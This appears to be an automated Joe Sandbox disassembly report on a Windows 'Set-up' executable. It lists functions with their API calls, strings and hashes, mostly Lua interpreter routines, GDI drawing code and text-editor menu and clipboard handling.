Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: lua_tolstring$L_argerrorL_error$lua_checkstacklua_pushfstring
String ID: invalid option '%s'$stack overflow$stack overflow (%s)$value expected
API String ID: 4106751321-40620427
Opcode ID: e42765be05bb12658b814c79ab7486314cb4526e670075daf5d35f0be65b35ef
Instruction ID: 64b12ad2beaab61c9e240de5822206cf9fe30708eced579c95b3ad6baa130239
Opcode Fuzzy Hash: e42765be05bb12658b814c79ab7486314cb4526e670075daf5d35f0be65b35ef
Instruction Fuzzy Hash: 6C81D6752042086BCB249F28E841AAAF7DADB85320F1585EBFD1887352FB31DD05D296

Function 00A62780 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 161libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,70576E16), ref: 00A627B2
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A627C8
LoadLibraryExW.KERNEL32(D2D1.DLL,00000000,00000000), ref: 00A627E1
GetProcAddress.KERNEL32(00000000,D2D1CreateFactory), ref: 00A627F2
LoadLibraryExW.KERNEL32(DWRITE.DLL,00000000,00000000), ref: 00A62810
GetProcAddress.KERNEL32(00000000,DWriteCreateFactory), ref: 00A62821
SystemParametersInfoW.USER32(0000200C,00000000,?,00000000), ref: 00A6289E

Strings

D2D1.DLL, xrefs: 00A627DC
kernel32.dll, xrefs: 00A627AB
DWRITE.DLL, xrefs: 00A6280B
D2D1CreateFactory, xrefs: 00A627EC
SetDefaultDllDirectories, xrefs: 00A627C2
DWriteCreateFactory, xrefs: 00A6281B

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: AddressProc$LibraryLoad$HandleInfoModuleParametersSystem
String ID: D2D1.DLL$D2D1CreateFactory$DWRITE.DLL$DWriteCreateFactory$SetDefaultDllDirectories$kernel32.dll
API String ID: 1659932648-1570380350
Opcode ID: c9bc1afce9037c7d1f24b158aed34ee8364c86603bd67fc04d039cde56752d1c
Instruction ID: bdbf2f1b19230de0560efa213718e62d020881647d83837ee9c08ba128808431
Opcode Fuzzy Hash: c9bc1afce9037c7d1f24b158aed34ee8364c86603bd67fc04d039cde56752d1c
Instruction Fuzzy Hash: A4517771A05615AFDB14DBE5DC84FAEBBB8EB48B14F114168E905A72D0CBB0E801CB65

Function 00A68D00 Relevance: 21.4, APIs: 14, Instructions: 375COMMON

Download Yara Rule

APIs

FillRect.USER32(00BFFB8B,?,00000006), ref: 00A68E00
FillRect.USER32(00BFFB8B,?,0000000E), ref: 00A68E0B
GetSysColor.USER32(0000000D), ref: 00A68E15
SetBkColor.GDI32(00BFFB8B,00000000), ref: 00A68E1B
FillRect.USER32(00BFFB8B,?,00000006), ref: 00A68E29
GetSysColor.USER32(00000005), ref: 00A68E37
SetBkColor.GDI32(00BFFB8B,00000000), ref: 00A68E3D
GetSysColor.USER32(00000008), ref: 00A68E45
SetTextColor.GDI32(00BFFB8B,00000000), ref: 00A68E4B
InflateRect.USER32(?,000000FE,00000000), ref: 00A68EB9
DrawTextW.USER32(00BFFB8B,?,?,?,00008920), ref: 00A68F10
DrawTextA.USER32(00BFFB8B,00C0DADD,00C0DADE,?,00008920), ref: 00A68F45
SetTextAlign.GDI32(00BFFB8B,00000000), ref: 00A69060
GetClientRect.USER32(00000000,?), ref: 00A690EC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Color$Rect$Text$Fill$Draw$AlignClientInflate
String ID:
API String ID: 4274750162-0
Opcode ID: dedbb33605f8bbaf1186c8b10ecfb4aa5eadcbfd0fa812e48bd1f526ffc41260
Instruction ID: 2a7600b014117a36372af974303b671d385094c733afbd1531269faf5eb2c71e
Opcode Fuzzy Hash: dedbb33605f8bbaf1186c8b10ecfb4aa5eadcbfd0fa812e48bd1f526ffc41260
Instruction Fuzzy Hash: 7BF1E375A04219DFCB20CF69C944BADBBF5FF48310F158299E949A7290DB32E991CF90

Function 00BDBB90 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 201COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00BDBC01
freopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00C5F370,?), ref: 00BDBC51

Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00BDBC1B), ref: 00BDBB13
Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB3D
Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB53
Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBB65

lua_pushfstring.SET-UP(?,@%s,?), ref: 00BDBC8E
lua_load.SET-UP(?,00BDB9C0,?,?,?), ref: 00BDBD4B
ferror.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBD5B
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBD70
lua_settop.SET-UP(?,?), ref: 00BDBD83

Strings

reopen, xrefs: 00BDBC63
read, xrefs: 00BDBD89
open, xrefs: 00BDBCAF
=stdin, xrefs: 00BDBBD1
@%s, xrefs: 00BDBC88

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: getc$__acrt_iob_funcfcloseferrorfreopenlua_loadlua_pushfstringlua_settop
String ID: =stdin$@%s$open$read$reopen
API String ID: 2661936588-2372923574
Opcode ID: cbd7bb629265df65b3730cba18750fbde2c35e028fb4f0ee645cf5895b7e42c1
Instruction ID: 0419725f1af31f61e08597e0f01136b58154eece38cd08cbee6a874b3c8e9258
Opcode Fuzzy Hash: cbd7bb629265df65b3730cba18750fbde2c35e028fb4f0ee645cf5895b7e42c1
Instruction Fuzzy Hash: A661A4756043458BCB14EF28989196FB7E5EF84314F0549BEF85A8B392EF30D809CB92

Function 00ACA380 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 178windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 00ACA3B9
CreatePopupMenu.USER32 ref: 00ACA3C9
TrackPopupMenu.USER32(?,00000002,00000000,00000000,00000000,?,00000000), ref: 00ACA577
DestroyMenu.USER32(?), ref: 00ACA588

Strings

Redo, xrefs: 00ACA428
Cut, xrefs: 00ACA468
Select All, xrefs: 00ACA542
Copy, xrefs: 00ACA4B1
Paste, xrefs: 00ACA4EC
Delete, xrefs: 00ACA51D
Undo, xrefs: 00ACA3FC

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Menu$DestroyPopup$CreateTrack
String ID: Copy$Cut$Delete$Paste$Redo$Select All$Undo
API String ID: 2310181020-1698107729
Opcode ID: 3b9fba0976acab34d110101ecad019f0ce8391fe677190aa16e64d5c2317c7e6
Instruction ID: fcc6c0973f335aa9f2e39db081810f4216843384ad5dd4fa64cce0aaee949985
Opcode Fuzzy Hash: 3b9fba0976acab34d110101ecad019f0ce8391fe677190aa16e64d5c2317c7e6
Instruction Fuzzy Hash: CF519F34380209AFDB309F64C849FB9B7E1AF55704F26846CF9869B2C1DBB1A841DB52

Function 00A6BF40 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 164registrywindowtimeCOMMON

Download Yara Rule

APIs

RegisterWindowMessageW.USER32(MSDEVColumnSelect), ref: 00A6C276
RegisterWindowMessageW.USER32(Borland IDE Block Type), ref: 00A6C284
RegisterWindowMessageW.USER32(MSDEVLineSelect), ref: 00A6C292
RegisterWindowMessageW.USER32(VisualStudioEditorOperationsLineCutCopyClipboardTag), ref: 00A6C2A0
GetCaretBlinkTime.USER32 ref: 00A6C30B

Strings

Borland IDE Block Type, xrefs: 00A6C278
VisualStudioEditorOperationsLineCutCopyClipboardTag, xrefs: 00A6C294
MSDEVColumnSelect, xrefs: 00A6C25A
`, xrefs: 00A6C1BD
MSDEVLineSelect, xrefs: 00A6C286
`, xrefs: 00A6C1C9

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: MessageRegisterWindow$BlinkCaretTime
String ID: Borland IDE Block Type$MSDEVColumnSelect$MSDEVLineSelect$VisualStudioEditorOperationsLineCutCopyClipboardTag$`$`
API String ID: 99429607-936588638
Opcode ID: 705c61dac9e9b7422dbf33fb557934363aa56ec2f85e1c713373df06f850a8b2
Instruction ID: 3733abc48435c23b00089724bebe4347c3108677a323236422936b773606cf2b
Opcode Fuzzy Hash: 705c61dac9e9b7422dbf33fb557934363aa56ec2f85e1c713373df06f850a8b2
Instruction Fuzzy Hash: 0AA16EB49193458ADF41CF55C59979A7BF0FF08318F1881B9DC0C9E28ADBBA2048DFA1

Function 00A67FF0 Relevance: 18.1, APIs: 12, Instructions: 127windowCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 00A68025
GetSystemMetrics.USER32(0000000D), ref: 00A6804E
MulDiv.KERNEL32(00000000,?,00000060), ref: 00A68065
GetSystemMetrics.USER32(0000000E), ref: 00A68087
MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6809A
CopyImage.USER32(00000000,00000002,?,00000000,00004004), ref: 00A680AC
GetIconInfo.USER32(00000000,?), ref: 00A680C3
GetObjectW.GDI32(?,00000018,?), ref: 00A680D6
CreateIconIndirect.USER32(?), ref: 00A68114
DeleteObject.GDI32(?), ref: 00A68125
DeleteObject.GDI32(?), ref: 00A6812F
DestroyCursor.USER32(00000000), ref: 00A68138

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: Object$CursorDeleteIconMetricsSystem$CopyCreateDestroyImageIndirectInfoLoad
String ID:
API String ID: 2946484514-0
Opcode ID: 817b62f3dbb418d6a7b4ca4f2e73266830177397c4eb6ea94500239ef179f148
Instruction ID: efd3576db39d2475948eaa72e9537923c5ba328bba4d6870b5f47a98edb8fdad
Opcode Fuzzy Hash: 817b62f3dbb418d6a7b4ca4f2e73266830177397c4eb6ea94500239ef179f148
Instruction Fuzzy Hash: 3741AF75A00209AFDB24DFA4DD44BAEBBBCEB08750F054229F906E32A0DE759D44CB60

Function 00BEAF30 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 188COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C386B0,00000000), ref: 00BEAFAD
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BEB09B
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BEB0B2

Strings

memory allocation error: block too big, xrefs: 00BEB146
mininteger, xrefs: 00BEB075
version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BEB0AC
huge, xrefs: 00BEB005
too many %s (limit is %d), xrefs: 00BEB12A
multiple Lua VMs detected, xrefs: 00BEB095
maxinteger, xrefs: 00BEB03D

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncs
String ID: huge$maxinteger$memory allocation error: block too big$mininteger$multiple Lua VMs detected$too many %s (limit is %d)$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2970048142-2361208633
Opcode ID: f3dafa738876bc408c151a4893c257aaeea96044cdc3e5f0df9380b932efe2c9
Instruction ID: f3e73848105c8875fd64f220b55050d7b26ac922d7e5d91d729257af81182280
Opcode Fuzzy Hash: f3dafa738876bc408c151a4893c257aaeea96044cdc3e5f0df9380b932efe2c9
Instruction Fuzzy Hash: DF51B4B06007045FD720AF28C842B5BB7E9DF45724F1086A9F869973D2EBB1ED148B96

Function 00BDA850 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

luaL_error.SET-UP(?,bad argument #%d (%s),?,?,00000001,?,?), ref: 00BDA918
luaL_getmetafield.SET-UP(?,?,__name,00000001,?,?,?,?,bad argument #%d (%s),?,?,00000001,?,?), ref: 00BDA931

Strings

light userdata, xrefs: 00BDA97E
%s expected, got %s, xrefs: 00BDA982
bad argument #%d (%s), xrefs: 00BDA912
__name, xrefs: 00BDA92A

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_errorL_getmetafield
String ID: %s expected, got %s$__name$bad argument #%d (%s)$light userdata
API String ID: 2939061749-459126790
Opcode ID: 69054947e7d14acead0f2a2a137167651fe7c34223dd0451fc748cbd9d5961e2
Instruction ID: 9cb2373d48c1a401733076b44c1991722e984d300868c7fe950fcb44318afd9f
Opcode Fuzzy Hash: 69054947e7d14acead0f2a2a137167651fe7c34223dd0451fc748cbd9d5961e2
Instruction Fuzzy Hash: 4601D4755016187B5B246A158C02CBFFBEDDE46B51B44046AFD19A3342FA64BE0182BF

Function 00BDB360 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 164COMMON

Download Yara Rule

APIs

luaL_newmetatable.SET-UP(?,?,?,LUABOX), ref: 00BDB457
lua_setmetatable.SET-UP(?,000000FE), ref: 00BDB4A7
memcpy.VCRUNTIME140(00000000,?,00000047), ref: 00BDB4C5
luaL_error.SET-UP(?,buffer too large), ref: 00BDB4E5
luaL_prepbuffsize.SET-UP(?,?,?,?,?,?,?,buffer too large), ref: 00BDB502
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,buffer too large), ref: 00BDB50C

Strings

LUABOX, xrefs: 00BDB443
buffer too large, xrefs: 00BDB4DF
__gc, xrefs: 00BDB487

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$L_errorL_newmetatableL_prepbuffsizelua_setmetatable
String ID: LUABOX$__gc$buffer too large
API String ID: 1698499383-1790742439
Opcode ID: fb5467cf3a3015d0275f0e1fecc78f9dbb084373c5e91178f7af4401c14b3d8d
Instruction ID: a9d4fdae783ca99f057f4e9356cbf9a0c541b3147c98c833fbb77a8d27fa623b
Opcode Fuzzy Hash: fb5467cf3a3015d0275f0e1fecc78f9dbb084373c5e91178f7af4401c14b3d8d
Instruction Fuzzy Hash: 61519071604204AFDB04DF19D881B5AFBE5FF85324F19C2AAE9088F396E775E840CB95

Function 00BEE3B0 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 158COMMON

Download Yara Rule

APIs

luaL_setfuncs.SET-UP(?,00C38968,00000000), ref: 00BEE425
luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BEE43D
luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BEE454

Strings

too many %s (limit is %d) in %s, xrefs: 00BEE4D4
main function, xrefs: 00BEE4B9, 00BEE4CF
version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BEE44E
%s expected, xrefs: 00BEE479
function at line %d, xrefs: 00BEE4C1
multiple Lua VMs detected, xrefs: 00BEE437

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: L_error$L_setfuncs
String ID: %s expected$function at line %d$main function$multiple Lua VMs detected$too many %s (limit is %d) in %s$version mismatch: app. needs %f, Lua core provides %f
API String ID: 2970048142-2974239533
Opcode ID: c7a6f0a6407e52a3b5c3d7608601439551ef37018325ca463bbe0f54022c0e2f
Instruction ID: f745f93afcc440c6187502b870f8971714f9430e80e1ba20a40080a1393ece0f
Opcode Fuzzy Hash: c7a6f0a6407e52a3b5c3d7608601439551ef37018325ca463bbe0f54022c0e2f
Instruction Fuzzy Hash: 8241D1B0600B049FD730AF29D841B5B77E4EF48704F1049A9F89997782EB70ED058B85

Function 00BDAA50 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85stringCOMMON

Download Yara Rule

APIs

luaL_where.SET-UP(?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA5B

Part of subcall function 00BDA9D0: lua_getstack.SET-UP(?,00BDA842,?,?), ref: 00BDA9EC
Part of subcall function 00BDA9D0: lua_getinfo.SET-UP(?,00C5F488,?,?,?,?), ref: 00BDAA02
Part of subcall function 00BDA9D0: lua_pushfstring.SET-UP(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 00BDAA1C

lua_pushvfstring.SET-UP(?,00BDA842,?,?,00000001,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA68
lua_concat.SET-UP(?,00000002,?,?,00BDA842,?,stack overflow), ref: 00BDAA73
lua_error.SET-UP(?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA7C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001,?,?,?,?,?,?,?,00BDA842,?,stack overflow), ref: 00BDAA98
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00BDAAD4
lua_pushfstring.SET-UP(?,%s: %s,00000000,00000000), ref: 00BDAAED

Strings

%s: %s, xrefs: 00BDAAE7

Memory Dump Source

Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: lua_pushfstring$L_where_errnolua_concatlua_errorlua_getinfolua_getstacklua_pushvfstringstrerror
String ID: %s: %s
API String ID: 4280543744-3740598653
Opcode ID: 8576c3b5805f12f1dcf178e7af920fc5da514ffc0fb8999e528f96811b9628d9
Instruction ID: fef0bebde15c01ef1794c08dbde40de9489c1c124c3690b8417c236fe7baad3a
Opcode Fuzzy Hash: 8576c3b5805f12f1dcf178e7af920fc5da514ffc0fb8999e528f96811b9628d9
Instruction Fuzzy Hash: AE21B472501704AFD7119F08DC06BAAB7E8EF02325F44809AF81957392E7B6A951CBE6

Function 00A73F20 Relevance: 15.2, APIs: 10, Instructions: 241COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,00000000), ref: 00A73F66
SetWindowLongW.USER32(?,00000000,?), ref: 00A73F8B
SetWindowLongW.USER32(?,00000000,00000000), ref: 00A73FAF
DefWindowProcW.USER32(?,?,?,?), ref: 00A74288

Memory Dump Source

